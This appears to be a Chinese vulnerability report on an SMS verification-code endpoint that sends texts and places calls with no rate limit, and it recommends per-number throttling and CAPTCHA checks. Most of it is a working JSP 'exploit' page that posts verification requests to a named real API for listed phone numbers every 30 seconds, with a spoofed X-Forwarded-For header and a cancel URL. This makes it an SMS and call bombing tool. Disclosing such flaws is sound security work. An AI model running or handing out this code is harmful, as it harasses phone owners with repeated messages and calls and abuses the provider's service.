|
某XXX的短信验证码接口未做发送次数限制和安全校验:每请求一次,便会自动发送一条短信并拨打一次电话。修复上,服务端应按手机号和真实来源地址限制发送频率与每日总量,并在发送前要求图形验证码等人机校验。
利用代码:
- <%@ page language="java" pageEncoding="UTF-8"%>
- <%@ page isThreadSafe="false" %>
- <%@ page import="java.io.OutputStreamWriter"%>
- <%@ page import="java.net.URLConnection"%>
- <%@ page import="java.net.URL"%>
- <%@ page import="java.util.*"%>
- <%!
- private static Timer t = new Timer(); // static: one Timer reference shared by every request to this page
- void test(){ // sends one get_verify_code request per listed number; startX() runs it every 30 s
- String[] str = "1321344xxx,134555455xxxx".split(",");// phone numbers, comma-separated
- for(String s:str){
- try{
- URLConnection u = new URL("http://www.kuaidadi.com/phone/api.php").openConnection();
- u.setDoInput(true);
- u.setDoOutput(true); // a request body is written below
- u.setConnectTimeout(3000);
- u.setReadTimeout(3000);
- u.setRequestProperty("x-forwarded-for", "12.34.12.34"); // header value is chosen by the client: a server must not key throttling on X-Forwarded-For, but on the destination number and the real peer address
- OutputStreamWriter osw = new OutputStreamWriter(u.getOutputStream(), "UTF-8");
- osw.write("mobile="+s+"&act=get_verify_code&sourceid=11"); // body carries only these three fields: no session, CAPTCHA answer or one-time token, which is what the endpoint should require before sending
- osw.flush();
- osw.close();
- u.getOutputStream();
- u.getInputStream(); // response is requested but never read or checked
- }catch(Exception e){ // every failure is discarded silently
- }
- }
- }
-
- void startX(){ // schedules test() on the shared Timer t as a repeating task
- t.schedule(new java.util.TimerTask() {
- public void run() {
- test();
- }
- }, 0, 30000); // initial delay 0 ms, then a 30000 ms period
- }
- %>
- <%
- try{
- if("cancel".equals(request.getParameter("action"))){ // ?action=cancel cancels the Timer currently held in t
- t.cancel();
- out.println("stop....");
- }else{ // any other request, including one without an action parameter, assigns a new Timer and starts the schedule
- t = new Timer();
- startX();
- }
- }catch(Exception e){
- out.println(e.toString()); // exception text is written into the page response
- }
- %>
如果想停止发送:http://www.xxx.cn/sm.jsp?action=cancel |
|